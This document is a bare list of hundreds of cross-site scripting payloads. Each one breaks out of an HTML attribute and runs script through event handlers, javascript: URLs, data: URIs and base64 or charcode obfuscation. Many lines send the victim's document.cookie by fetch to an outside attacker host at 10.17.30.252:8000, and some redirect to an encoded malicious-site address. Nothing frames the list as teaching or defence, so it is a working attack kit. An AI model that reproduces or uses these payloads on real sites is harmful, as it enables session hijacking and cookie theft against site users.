"><script>document.body.innerHTML += '<img src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+" onerror="eval(atob(\'YWxlcnQoMSk=\'))">';</script><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><svg/onload=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><embed type="image/jpg" src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" type="text/html"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><base href="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><style>@import 'data:text/css;base64,body:before{content:"eval(atob(\'YWxlcnQoMSk=\'))"}';</style><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><isindex action="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><xmp><img src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onerror="eval(atob('YWxlcnQoMSk='))"></xmp><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><textarea onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><svg/onload="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><iframe srcdoc="<script>eval(atob('YWxlcnQoMSk='))</script>" sandbox="allow-scripts"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><a href="javascript:eval(atob('YWxlcnQoMSk='))">Click here</a><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><script>eval(atob('YWxlcnQoMSk='))</script><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><img src=x onerror="alert(1)//'"><h1>hi</h1>
"><script>document.body.innerHTML='<h1>hi</h1>';alert(1)//</script>
"><svg/onload=alert(1)><h1>hi</h1><img src=x onerror=alert(1)>
"><iframe src="javascript:alert(1)"><h1>hi</h1></iframe>
"><script src="data:text/javascript,alert(1)"><h1>hi</h1></script>
"><details open ontoggle=alert(1)><h1>hi</h1></details>
"><input autofocus onfocus=alert(1)><h1>hi</h1>
"><select autofocus onfocus=alert(1)><h1>hi</h1><option></select>
"><textarea autofocus onfocus=alert(1)><h1>hi</h1></textarea>
"><svg/onload=alert(1)><h1>hi</h1>
"><math><mtext><title>alert(1)</title></mtext></math><h1>hi</h1>
"><audio src="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1></audio>
"><video src="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1></video>
"><body onresize=alert(1)><h1>hi</h1></body>
"><marquee onstart=alert(1)><h1>hi</h1></marquee>
"><embed src="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1></embed>
"><object data="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1></object>
"><bgsound src="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1></bgsound>
"><base href="javascript:alert(1)"><h1>hi</h1></base>
"><link rel=stylesheet href="data:text/css,body:before{content:'alert(1)'}"><h1>hi</h1></link>
"><style>@import 'data:text/css,body:before{content:"alert(1)"}';</style><h1>hi</h1>
"><isindex action="javascript:alert(1)"><h1>hi</h1></isindex>
"><xmp><img src="data:text/html,<script>alert(1)</script>" onerror=alert(1)></xmp><h1>hi</h1>
"><noscript><p title="alert(1)"></noscript><h1>hi</h1>
"><plaintext><img src="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1>
"><svg/onload=alert(1)><h1>hi</h1></svg>
"><!--<svg/onload=alert(1)>--><h1>hi</h1>
"><!--<img src="data:text/html,<script>alert(1)</script>" onerror=alert(1)>--><h1>hi</h1>
"><form action="javascript:alert(1)"><h1>hi</h1></form>
"><button onclick="alert(1)"><h1>hi</h1></button>
"><keygen autofocus onfocus=alert(1)><h1>hi</h1></keygen>
"><iframe src="javascript:alert(1)"><h1>hi</h1></iframe>
"><script type="text/javascript">alert(1)</script><h1>hi</h1>
"><img src="data:text/html,<svg/onload=alert(1)>" onerror="alert(1)"><h1>hi</h1>
"><a href="javascript:alert(1)">Click me</a><h1>hi</h1>
"><input type="text" onfocus="alert(1)"><h1>hi</h1>
"><details open ontoggle="alert(1)"><summary>Click me</summary><h1>hi</h1></details>
"><script>document.body.innerHTML='<h1>hi</h1>';</script><img src=x onerror=alert(1)>
"><svg/onload=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><iframe src="javascript:alert(1)"><h1>hi</h1></iframe>
"><script src="data:text/javascript,alert(1)"><h1>hi</h1></script>
"><details open ontoggle=alert(1)><h1>hi</h1></details>
"><input autofocus onfocus=alert(1)><h1>hi</h1>
"><select autofocus onfocus=alert(1)><h1>hi</h1><option></select>
"><textarea autofocus onfocus=alert(1)><h1>hi</h1></textarea>
"><svg/onload=alert(1)><h1>hi</h1>
"><math><mtext><title>alert(1)</title></mtext></math><h1>hi</h1>
"><audio src="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1></audio>
"><video src="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1></video>
"><body onresize=alert(1)><h1>hi</h1></body>
"><marquee onstart=alert(1)><h1>hi</h1></marquee>
"><embed src="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1></embed>
"><object data="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1></object>
"><bgsound src="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1></bgsound>
"><base href="javascript:alert(1)"><h1>hi</h1></base>
"><link rel=stylesheet href="data:text/css,body:before{content:'alert(1)'}"><h1>hi</h1></link>
"><style>@import 'data:text/css,body:before{content:"alert(1)"}';</style><h1>hi</h1>
"><isindex action="javascript:alert(1)"><h1>hi</h1></isindex>
"><xmp><img src="data:text/html,<script>alert(1)</script>" onerror=alert(1)></xmp><h1>hi</h1>
"><noscript><p title="alert(1)"></noscript><h1>hi</h1>
"><plaintext><img src="data:text/html,<script>alert(1)</script>" onerror=alert(1)><h1>hi</h1>
"><svg/onload=alert(1)><h1>hi</h1></svg>
"><!--<svg/onload=alert(1)>--><h1>hi</h1>
"><!--<img src="data:text/html,<script>alert(1)</script>" onerror=alert(1)>--><h1>hi</h1>
"><form action="javascript:alert(1)"><h1>hi</h1></form>
"><button onclick="alert(1)"><h1>hi</h1></button>
"><keygen autofocus onfocus=alert(1)><h1>hi</h1></keygen>
"><iframe src="javascript:alert(1)"><h1>hi</h1></iframe>
"><script type="text/javascript">alert(1)</script><h1>hi</h1>
"><img src="data:text/html,<svg/onload=alert(1)>" onerror="alert(1)"><h1>hi</h1>
"><a href="javascript:alert(1)">Click me</a><h1>hi</h1>
"><input type="text" onfocus="alert(1)"><h1>hi</h1>
"><details open ontoggle="alert(1)"><summary>Click me</summary><h1>hi</h1></details>
"><script>document.write('<img src="data:text/html,<svg/onload=alert(1)>" onerror="alert(1)">')</script><h1>hi</h1>
"><script>document.body.innerHTML += '<img src="data:text/html,<svg/onload=alert(1)>" onerror="alert(1)">';</script><h1>hi</h1>
"><svg/onload=eval('alert(1)')><h1>hi</h1></svg>
"><embed type="image/jpg" src="data:text/html,<script>alert(1)</script>" onerror="alert(1)"><h1>hi</h1></embed>
"><object data="data:text/html,<script>alert(1)</script>" type="text/html"><h1>hi</h1></object>
"><base href="javascript:alert(1)"><h1>hi</h1></base>
"><style>@import 'data:text/css,body:before{content:"alert(1)"}';</style><h1>hi</h1>
"><isindex action="javascript:alert(1)"><h1>hi</h1></isindex>
"><xmp><img src="data:text/html,<script>alert(1)</script>" onerror="alert(1)"></xmp><h1>hi</h1>
"><textarea onfocus="alert(1)"><h1>hi</h1></textarea>
"><svg/onload="alert(1)"><h1>hi</h1></svg>
"><iframe srcdoc="<script>alert(1)</script>" sandbox="allow-scripts"><h1>hi</h1></iframe>
"><a href="javascript:alert(1)">Click here</a><h1>hi</h1>
"><script>eval('alert(1)')</script><h1>hi</h1>
"><svg/onload=fetch('http://10.17.30.252:8000?'+btoa(document.cookie))><h1>hi</h1>
"><img src=x onerror=eval(String.fromCharCode(102,101,116,99,104,40,39,104,116,116,112,58,47,47,121,111,117,114,45,109,97,108,105,99,105,111,117,115,45,115,105,116,101,46,99,111,109,39,41))><h1>hi</h1>
"><iframe src="javascript:fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><h1>hi</h1></iframe>
"><script src="data:text/javascript,fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><h1>hi</h1></script>
"><details open ontoggle=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></details>
"><input autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1>
"><select autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1><option></select>
"><textarea autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></textarea>
"><svg/onload=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1>
"><math><mtext><title>eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')</title></mtext></math><h1>hi</h1>
"><audio src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></audio>
"><video src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></video>
"><body onresize=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></body>
"><marquee onstart=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></marquee>
"><embed src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></embed>
"><object data="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></object>
"><bgsound src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></bgsound>
"><base href="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></base>
"><link rel=stylesheet href="data:text/css,body:before{content:'fetch("http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie)')"><h1>hi</h1></link>
"><style>@import 'data:text/css,body:before{content:"fetch(\'http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie)+'\')"}';</style><h1>hi</h1>
"><isindex action="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></isindex>
"><xmp><img src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))></xmp><h1>hi</h1>
"><noscript><p title="fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"></noscript><h1>hi</h1>
"><plaintext><img src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1>
"><svg/onload=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></svg>
"><!--<svg/onload=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))>--><h1>hi</h1>
"><!--<img src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))>--><h1>hi</h1>
"><form action="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></form>
"><button onclick="fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></button>
"><keygen autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></keygen>
"><iframe src="javascript:fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><h1>hi</h1></iframe>
"><script type="text/javascript">fetch('http://10.17.30.252:8000?cookie='+document.cookie)</script><h1>hi</h1>
"><img src="data:text/html,<svg/onload=fetch('http://10.17.30.252:8000?cookie='+document.cookie)>" onerror="fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><h1>hi</h1>
"><a href="javascript:fetch('http://10.17.30.252:8000?cookie='+document.cookie)">Click me</a><h1>hi</h1>
"><input type="text" onfocus="fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><h1>hi</h1>
"><details open ontoggle="fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><summary>Click me</summary><h1>hi</h1></details>
"><script>document.write('<img src="data:text/html,<svg/onload=fetch(\'http://10.17.30.252:8000?cookie='+document.cookie+'\')>" onerror="fetch(\'http://10.17.30.252:8000?cookie='+document.cookie+'\')">')</script><h1>hi</h1>
"><script>document.body.innerHTML += '<img src="data:text/html,<svg/onload=fetch(\'http://10.17.30.252:8000?cookie='+document.cookie+'\')>" onerror="fetch(\'http://10.17.30.252:8000?cookie='+document.cookie+'\')">';</script><h1>hi</h1>
"><svg/onload=eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')><h1>hi</h1></svg>
"><embed type="image/jpg" src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+document.cookie)</script>" onerror="fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><h1>hi</h1></embed>
"><object data="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+document.cookie)</script>" type="text/html"><h1>hi</h1></object>
"><base href="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></base>
"><svg/onload=fetch('http://10.17.30.252:8000?cookie='+document.cookie)//><h1>hi</h1>
"><img src=x onerror=eval("fetch('http://10.17.30.252:8000?cookie='+document.cookie)")><h1>hi</h1>
"><iframe src="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></iframe>
"><script src=data:text/javascript,eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')><h1>hi</h1></script>
"><details open ontoggle=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></details>
"><input autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1>
"><select autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1><option></select>
"><textarea autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></textarea>
"><svg/onload=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1>
"><math><mtext><title>eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')</title></mtext></math><h1>hi</h1>
"><audio src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')><h1>hi</h1></audio>
"><video src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')><h1>hi</h1></video>
"><body onresize=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></body>
"><marquee onstart=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></marquee>
"><embed src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')><h1>hi</h1></embed>
"><object data="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')><h1>hi</h1></object>
"><bgsound src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')><h1>hi</h1></bgsound>
"><base href="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></base>
"><link rel=stylesheet href="data:text/css,body:before{content:'fetch("http://10.17.30.252:8000?cookie="+document.cookie)'}"><h1>hi</h1></link>
"><style>@import 'data:text/css,body:before{content:"fetch(\'http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie)+'\')"}';</style><h1>hi</h1>
"><isindex action="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></isindex>
"><xmp><img src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')></xmp><h1>hi</h1>
"><noscript><p title="fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"></noscript><h1>hi</h1>
"><plaintext><img src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')><h1>hi</h1>
"><svg/onload=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></svg>
"><!--<svg/onload=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))>--><h1>hi</h1>
"><!--<img src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror=eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')>--><h1>hi</h1>
"><form action="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></form>
"><button onclick="fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></button>
"><keygen autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></keygen>
"><iframe src="javascript:fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><h1>hi</h1></iframe>
"><script type="text/javascript">fetch('http://10.17.30.252:8000?cookie='+document.cookie)</script><h1>hi</h1>
"><img src="data:text/html,<svg/onload=fetch('http://10.17.30.252:8000?cookie='+document.cookie)>" onerror="fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><h1>hi</h1>
"><a href="javascript:fetch('http://10.17.30.252:8000?cookie='+document.cookie)">Click me</a><h1>hi</h1>
"><input type="text" onfocus="fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><h1>hi</h1>
"><details open ontoggle="fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><summary>Click me</summary><h1>hi</h1></details>
"><script>document.write('<img src="data:text/html,<svg/onload=fetch(\'http://10.17.30.252:8000?cookie='+document.cookie+'\')>" onerror="fetch(\'http://10.17.30.252:8000?cookie='+document.cookie+'\')">')</script><h1>hi</h1>
"><script>document.body.innerHTML += '<img src="data:text/html,<svg/onload=fetch(\'http://10.17.30.252:8000?cookie='+document.cookie+'\')>" onerror="fetch(\'http://10.17.30.252:8000?cookie='+document.cookie+'\')">';</script><h1>hi</h1>
"><svg/onload=eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')><h1>hi</h1></svg>
"><embed type="image/jpg" src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+document.cookie)</script>" onerror="fetch('http://10.17.30.252:8000?cookie='+document.cookie)"><h1>hi</h1></embed>
"><object data="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+document.cookie)</script>" type="text/html"><h1>hi</h1></object>
"><base href="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></base>
"><style>@import 'data:text/css,body:before{content:"fetch(\'http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie)+'\')"}';</style><h1>hi</h1>
"><isindex action="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></isindex>
"><xmp><img src="data:text/html,<script>fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))</script>" onerror="fetch('http://10.17.30.252:8000?cookie='+document.cookie)"></xmp><h1>hi</h1>
"><textarea onfocus="fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></textarea>
"><svg/onload="fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></svg>
"><iframe srcdoc="<script>fetch('http://10.17.30.252:8000?cookie='+document.cookie)</script>" sandbox="allow-scripts"><h1>hi</h1></iframe>
"><a href="javascript:fetch('http://10.17.30.252:8000?cookie='+document.cookie)">Click here</a><h1>hi</h1>
"><script>eval('fetch("http://10.17.30.252:8000?cookie="+document.cookie)')</script><h1>hi</h1>
&quot;&lt;h1&gt;hi&lt;/h1&gt;
&#34;&lt;h1&gt;hi&lt;/h1&gt;
&#x22;&lt;h1&gt;hi&lt;/h1&gt;
\u0022<h1>hi</h1>
\x22<h1>hi</h1>
&QUOT;&lt;h1&gt;hi&lt;/h1&gt;
\u0022<h1>hi</h1>
&#x000022;&lt;h1&gt;hi&lt;/h1&gt;
&#034;&lt;h1&gt;hi&lt;/h1&gt;
&#34;&lt;h1&gt;hi&lt;/h1&gt;
&quot; <h1>hi</h1>
&#x22; <h1>hi</h1>
&QUOT; <h1>hi</h1>
\x22 <h1>hi</h1>
&#034; <h1>hi</h1>
&#34; <h1>hi</h1>
&#x22; <h1>hi</h1>
&quot;&lt;h1&gt;hi&lt;/h1&gt;
\u0022<h1>hi</h1>
\x22<h1>hi</h1>
&#x000022;<h1>hi</h1>
&#034;<h1>hi</h1>
&#34;<h1>hi</h1>
&quot;<h1>hi</h1>
\u0022 <h1>hi</h1>
\x22 <h1>hi</h1>
&#x22; <h1>hi</h1>
&#034; <h1>hi</h1>
&#34; <h1>hi</h1>
&quot; <h1>hi</h1>
"><svg/onload=fetch('http://10.17.30.252:8000')><h1>hi</h1>
"><img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><iframe src=javascript:alert(1)><h1>hi</h1></iframe>
"><script src=data:,alert(1)><h1>hi</h1></script>
"><details open ontoggle=confirm(1)><h1>hi</h1></details>
"><input autofocus onfocus=alert(1)><h1>hi</h1></input>
"><select autofocus onfocus=alert(1)><h1>hi</h1><option></select>
"><textarea autofocus onfocus=alert(1)><h1>hi</h1></textarea>
"><svg/onload=location.href='http://10.17.30.252:8000'><h1>hi</h1>
"><math><mtext><title>alert(1)</title></mtext></math><h1>hi</h1>
"><audio src onerror=alert(1)><h1>hi</h1></audio>
"><video src onerror=alert(1)><h1>hi</h1></video>
"><body onresize=alert(1)><h1>hi</h1></body>
"><marquee onstart=alert(1)><h1>hi</h1></marquee>
"><embed src=javascript:alert(1)><h1>hi</h1></embed>
"><object data=javascript:alert(1)><h1>hi</h1></object>
"><bgsound src=javascript:alert(1)><h1>hi</h1></bgsound>
"><base href=javascript:alert(1)><h1>hi</h1></base>
"><link rel=stylesheet href=javascript:alert(1)><h1>hi</h1></link>
"><style>@import 'javascript:alert(1)';</style><h1>hi</h1>
"><isindex action=javascript:alert(1)><h1>hi</h1></isindex>
"><xmp><img src=1 onerror=alert(1)></xmp><h1>hi</h1>
"><noscript><p title=alert(1)></noscript><h1>hi</h1>
"><plaintext><img src=1 onerror=alert(1)><h1>hi</h1>
"><svg/onload=alert(1)//><h1>hi</h1>
"><!--<svg/onload=alert(1)>--><h1>hi</h1>
"><!--<img src=1 onerror=alert(1)>--><h1>hi</h1>
"><form action=javascript:alert(1)><h1>hi</h1></form>
"><button onclick=alert(1)><h1>hi</h1></button>
"><keygen autofocus onfocus=alert(1)><h1>hi</h1></keygen>
"><svg/onload=fetch('http://10.17.30.252:8000?'+document.cookie)><h1>hi</h1>
"><img src=x onerror=eval(String.fromCharCode(102,101,116,99,104,40,39,104,116,116,112,58,47,47,121,111,117,114,45,109,97,108,105,99,105,111,117,115,45,115,105,116,101,46,99,111,109,39,41))><h1>hi</h1>
"><iframe src="javascript:eval(atob('YWxlcnQoMik='))"><h1>hi</h1></iframe>
"><script src="data:text/javascript,alert(1)"><h1>hi</h1></script>
"><details open ontoggle=fetch('http://10.17.30.252:8000?'+btoa(document.cookie))><h1>hi</h1></details>
"><input autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+btoa(document.cookie))><h1>hi</h1>
"><select autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+btoa(document.cookie))><h1>hi</h1><option></select>
"><textarea autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+btoa(document.cookie))><h1>hi</h1></textarea>
"><svg/onload=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1>
"><math><mtext><title>eval('alert(1)')</title></mtext></math><h1>hi</h1>
"><audio src="data:text/html,<script>alert(1)</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></audio>
"><video src="data:text/html,<script>alert(1)</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></video>
"><body onresize=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></body>
"><marquee onstart=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></marquee>
"><embed src="data:text/html,<script>alert(1)</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></embed>
"><object data="data:text/html,<script>alert(1)</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></object>
"><bgsound src="data:text/html,<script>alert(1)</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></bgsound>
"><base href="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></base>
"><link rel=stylesheet href="data:text/css,body:before{content:'alert(1)'}"><h1>hi</h1></link>
"><style>@import 'data:text/css,body:before{content:'alert(1)'}';</style><h1>hi</h1>
"><isindex action="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></isindex>
"><xmp><img src="data:text/html,<script>alert(1)</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))></xmp><h1>hi</h1>
"><noscript><p title=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))></noscript><h1>hi</h1>
"><plaintext><img src="data:text/html,<script>alert(1)</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1>
"><svg/onload=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))//><h1>hi</h1>
"><!--<svg/onload=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))>--><h1>hi</h1>
"><!--<img src="data:text/html,<script>alert(1)</script>" onerror=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))>--><h1>hi</h1>
"><form action="javascript:fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))"><h1>hi</h1></form>
"><button onclick=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></button>
"><keygen autofocus onfocus=fetch('http://10.17.30.252:8000?cookie='+encodeURIComponent(document.cookie))><h1>hi</h1></keygen>
"><img src=x onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><iframe src=javascript:eval(atob('YWxlcnQoMSk='))><h1>hi</h1></iframe>
"><script src=data:text/javascript;base64,YWxlcnQoMSk=></script><h1>hi</h1>
"><details open ontoggle=eval(atob('Y29uZmlybSgxKQ=='))><h1>hi</h1></details>
"><input autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1></input>
"><select autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><option></select>
"><textarea autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1></textarea>
"><svg/onload=location.href=atob('aHR0cDovL3lvdXItbWFsaWNpb3VzLXNpdGUuY29t')><h1>hi</h1>
"><math><mtext><title>eval(atob('YWxlcnQoMSk='))</title></mtext></math><h1>hi</h1>
"><audio src onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1></audio>
"><video src onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1></video>
